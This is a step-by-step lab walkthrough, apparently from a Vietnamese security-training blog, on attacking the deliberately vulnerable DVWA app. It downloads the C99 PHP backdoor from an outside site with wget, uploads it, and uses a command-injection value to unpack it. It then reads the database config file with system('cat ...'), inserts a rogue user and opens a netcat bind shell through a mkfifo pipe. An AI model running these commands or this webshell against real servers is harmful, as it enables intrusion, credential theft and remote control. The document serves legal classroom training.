{ Upload and use C99.php Backdoor shell }
| Section 0. Background Information |
- What is Damn Vulnerable Web App (DVWA)?
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
- Pre-Requisite Labs
- Lab Notes
- In this lab we will do the following:
- We will download C99.php.
- We will upload C99.php to the DVWA Upload screen.
- We will search for sensitive database files.
- We will extract the database password.
- We will execute netcat from the C99.php Bind Interface.
- Legal Disclaimer
Bài lab chỉ dùng cho mục đích nghiên cứu và học tập trong môi trường lớp học.
| Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit BackTrack Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click on the OK Button.
| Section 2. Login to Fedora14 |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14
- Play virtual machine
- Login to Fedora14
- Instructions:
- Login: student
- Password: <whatever you set it to>.
-
| Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
-
- Get IP Address
- Instructions:
- ifconfig -a
- Notes:
- As indicated below, my IP address is 192.168.1.106.
- Please record your IP address.
| Section 4. Temporarily Disable SELINUX and Firewall |
- Start a Terminal Console
- Instructions:
- sestatus
- If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
- If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
- Notes:
- In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
- Place selinux in permissive mode
- Instructions:
- echo 0 > /selinux/enforce
- Placing a "0" in the enforce file, puts selinux in permissive mode.
- sestatus
- Notice that "Current mode:" changed to permissive.
-
- Disable Firewall
- Instructions:
- service iptables save
- This is not really necessary, unless you have made recent changes to the firewall.
- service iptables stop
- This command disables the firewall.
| Section 5. Fix Upload Ownership and Permissions |
- Fix Ownership and Permissions
- Instructions:
- Bring up a Terminal Console on the DVWA (Fedora14) machine.
- chown root:apache /var/www/html/dvwa/hackable/uploads/
- chmod 775 /var/www/html/dvwa/hackable/uploads/
- ls -ld /var/www/html/dvwa/hackable/uploads/
- Known Issue:
- By default, the /var/www/html/dvwa/hackable/uploads/ directory is user and group owned by root.
- In addition, the apache user did not have "write" permission to allow a user to place a file in the hackable/uploads directory.
| Section 6. Configure BackTrack Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit BackTrack Virtual Machine Settings
- Instructions:
- Highlight BackTrack5R1
- Click Edit virtual machine settings
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click on the OK Button.
| Section 7. Login to BackTrack |
- Start BackTrack VM Instance
- Instructions:
- Start Up VMWare Player
- Select BackTrack5R1
- Play virtual machine
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up the GNOME
- Instructions:
- Type startx
| Section 8. Open Console Terminal and Retrieve IP Address |
- Open a console terminal
- Instructions:
- Click on the console terminal
- Get IP Address
- Instructions:
- ifconfig -a
- Notes:
- As indicated below, my IP address is 192.168.1.105.
- Please record your IP address.
| Section 9. Download c99.php |
- Open a console terminal
- Instructions:
- Click on the console terminal
- Create msfpayload
- Instructions:
- mkdir -p /root/backdoor
- cd /root/backdoor/
- wget http://r57.gen.tr/shell/c99.rar
- ls -l c99.rar
- Edit PHONE_HOME.php
- Note(FYI):
- A rar file is a type of compress format that is seen more in the windows environment than in linux.
- Also, we will edit the c99.php file with the sed utility.
- Instructions:
- unrar x c99.rar
- cp c99.php c99.php.bkp
- head -1 c99.php
- Notice how the first line does NOT contain "<?php".
- sed -i '1 s/^.*$/<?php/g' c99.php
- This only replaces the first line of file with "<?php".
- head -1 c99.php
- Notice how the first line DOES contain "<?php".
- gzip c99.php
- I compress c99.php, because DVWA does not allow you to upload files greater than 10000 bytes.
- I use gzip instead of rar, because gzip pretty much comes standard on most flavors of linux.
- ls -l
| Section 10. Login to DVWA |
- Start Firefox
- Instructions:
- Click on Firefox
- Login to DVWA
- Instructions:
- Start up Firefox on BackTrack
- Place http://192.168.1.106/dvwa/login.php in the address bar.
- Replace 192.168.1.106 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
- Login: admin
- Password: password
- Click on Login
| Section 11. Set Security Level |
- Set DVWA Security Level
- Instructions:
- Click on DVWA Security, in the left hand menu.
- Select "low"
- Click Submit
| Section 12. Upload PHP Payload |
- Upload Menu
- Instructions:
- Select "Upload" from the left navigation menu.
- Click Browse
-
- Navigate to /root/backdoor/c99.php.gz
- Instructions:
- Click on root icon, then the backdoor folder
- Click on c99.php.gz
- Select Open
- Upload c99.php.gz
- Instructions:
- Click the Browse button and navigate to /root/backdoor/c99.php.gz
- Click the Upload Button
- Note(FYI):
- Hopefully you will receive a successfully uploaded message like below.
- Activate PHONE_HOME.php
- Instructions:
- http://192.168.1.106/dvwa/hackable/uploads/
- Replace 192.168.1.106 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
- Notice c99.php.gz is listed
- Click the Back Button after you read the below Note.
- Note(FYI):
- Okay this is great and all, but we still have a problem.
- The problem is that we cannot execute a compressed php file.
- Use Command Execution to uncompress c99.php.gz
- Instruction:
- Click on Command Execution
- 192.168.1.106; /bin/gunzip -v ../../hackable/uploads/c99.php
- Replace 192.168.1.106 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
- Click the Submit Button
- Establishing a Shell
- Instructions:
- http://192.168.1.106/dvwa/hackable/uploads/
- Replace 192.168.1.106 with the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
- Click on c99.php
| Section 14. Using c99.php's to grab database password |
- Server security information
- Instructions:
- Click on the Sec. link
- Select "find config.inc.php files"
- Sometimes ignorant application admins place database config files in a public location.
- Click on the Execute button
- Server security information
- Instructions:
- Highlight /var/www/html/dvwa/config/config.inc.php
- Select Edit --> Copy
- PHP-code
- Instructions:
- Click on the PHP-code link
- In the Execution PHP-code box place the below command:
- system("cat /var/www/html/dvwa/config/config.inc.php");
- Click on the Execution Button
- Extract Database Password
- Note(FYI):
- Notice the config.inc.php file list the database name, username and password information.
- Instructions:
- Write down the the database name, username and password information.
| Section 15. Using c99.php's to examine pillage the database |
- Connect to SQL
- Instructions:
- Click the SQL navigation link.
- Username: root
- Password: dvwaPASSWORD
- Database: dvwa
- Click the Connect Button
- Connect to SQL
- Note(FYI):
- Notice Action icons, designated under the yellow arrow. From left to right, the stand for delete, drop and insert.
- Notice you have the ability to Create and Dump the database, which is also designated with yellow arrows.
- Instructions:
- Click the users table
- SQL Insert
- Note(FYI):
- Notice the Action icons, designated under the yellow arrow. For each user from left to right, you have the ability to delete or modify their record.
- Instructions:
- Click the Insert Navigational Link
- Create a new user
- Note(FYI):
- Use your first_name and last_name for Proof of Lab purposes.
- Instructions:
- user_id: 6
- first_name: Use your actual first name
- last_name: Use your actual last name
- user: student
- Select PASSWORD from the drop down
- password: hacker
- avatar: NA
- Click the Confirm Button
- Finalize User Creation
- Note(FYI):
- Notice the SQL insert line that will be inserted into the database. Here, the author allows you to tweak it if you need to.
- Instructions:
- Click on the Yes button.
- Viewing User Creation Results
- Note(FYI):
- Notice a new student record appears.
| Section 16. Use c99.php to Bind with Netcat |
- Bind with Netcat
- Instructions:
- Click on the Bind Navigational Link
- In the Command execute box enter the below syntax
- mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
- Click the Execute Button
- Notice the Connecting Message in the tab.
- This means a netcat session is started
- Continue to next step
- Proof of Lab
- Instructions:
- nc 192.168.1.106 4444
- Replace 192.168.1.106 with the DVWA's IP Address obtained in (Section 3, Step 3).
- whoami
- pwd
- echo "select * from dvwa.users where user = 'student';" | mysql -uroot -pdvwaPASSWORD
- date
- echo "Your Name"
- Proof of Lab Instructions:
- Do a <PrtScn>
- Paste into a word document
- Upload to website Www.AnToanThongTin.Edu.Vn
-
0 nhận xét:
Đăng nhận xét